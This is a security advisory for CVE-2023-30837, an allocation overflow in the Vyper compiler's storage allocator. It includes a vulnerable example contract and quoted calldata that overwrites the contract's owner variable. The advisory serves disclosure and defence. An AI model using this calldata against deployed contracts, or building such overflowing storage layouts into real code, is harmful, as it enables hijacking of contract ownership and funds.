CVE-2023-30837: vyper vulnerable to storage allocator overflow
(updated )
Impact
The storage allocator does not guard against allocation overflows. This can result in vulnerabilities like the following:
owner: public(address)
take_up_some_space: public(uint256[10])
buffer: public(uint256[max_value(uint256)])
@external
def initialize():
self.owner = msg.sender
@external
def foo(idx: uint256, data: uint256):
self.buffer[idx] = data
Per @toonvanhove, “An attacker can overwrite the owner variable by calling this contract with calldata: 0x04bc52f8 fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
(spaces inserted for readability)
0x04bc52f8
is the selector for foo(uint256, uint256)
, and the last argument fff...fff
is the new value for the owner variable.”
References
Detect and mitigate CVE-2023-30837 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →